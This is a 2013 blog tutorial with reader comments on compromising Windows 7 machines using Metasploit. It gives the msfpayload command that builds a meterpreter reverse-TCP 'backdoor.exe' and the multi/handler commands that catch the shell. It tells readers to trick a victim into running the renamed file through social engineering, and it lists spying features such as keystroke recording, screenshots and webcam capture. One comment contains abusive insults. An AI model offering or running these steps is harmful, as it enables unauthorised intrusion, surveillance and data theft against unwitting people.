Pages

Wednesday 5 June 2013

Hack Any Windows 7 With Metasploit


In this tutorial I will exploit a Windows 7 Sp1 OS using Metasploit. I will be using the exploit/multi/handler module which “provides all of the features of the Metasploit payload system to exploits that have been launched  outside of the framework“

Before we fire up Metasploit, we need to create a payload in order to gain a meterpreter shell. To create a payload type this in the terminal without the quotes:


msfpayload windows/meterpreter/reverse_tcp LHOST=”your Local IP” LPORT=”listening port” x > /root/backdoor.exe





I used port 4444 (you can choose your own port) for the LPORT which is the listening port and set the LHOST to the IP of the remote attacker which is obviously your Local IP address, my IP is 192.168.10.5.










After that, you should be able to see a file named as backdoor.exe in /root. Send the file to the victim by using your Social Engineering skills and let him click the file. You can change the name of the file so that it is not that obvious.

Launch Metasploit and set the exploit by typing these commands in your msfconsole:



use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp

set lhost 192.168.10.5
set lport 4444
exploit





If all goes well, you should be able to establish a meterpreter session. Type sysinfo to gather some info on the machine. To know other commands for the meterpreter type help. There are also other meterpreter commands like capturing the screenshot of the PC, record keystrokes, capture a snapshot from a webcam, etc. To enter the command shell of the machine, type shell.
it,s cool to take a screenshot with meterpreter command screenshot.

6 comments:

  1. How to know the port number which you have used as 4444.

    ReplyDelete
  2. I am new to this. I am interested to learn hacking using Kali Linux. I get Kali from my Friend. Can you help me with this and give me some tips to develop my knowledge.

    ReplyDelete
  3. I hv successfully attacked a system using metasploit payload attack(both are my systems) after rebooting the system iam unable to attack the same system using previous lhost and lport.
    "It says handler failed to bind <1st attempted lhost>"
    address already in use

    ReplyDelete
  4. ya kiya chotiyapa hyy randi ky bachoo
    msfpayload windows/meterpreter/reverse_tcp LHOST=”your Local IP” LPORT=”listening port” x > /root/backdoor.exe
    randi ky bachy victim ki ip kiya tayri maa ky phuddy may daloooo tayray ip hgacker ki maa ka phudda backdoor.exe/ enter/yourhackbook/ki/maa/ka/phudda
    hacked :D hacked by lun exploit tutorial

    ReplyDelete
  5. ....exe is not valid win 32 application,plz how to fix it

    ReplyDelete
  6. We will be getting a reverse TCP connection from the victim machine by using a small backdoor windows 7 exploit metasploit.

    ReplyDelete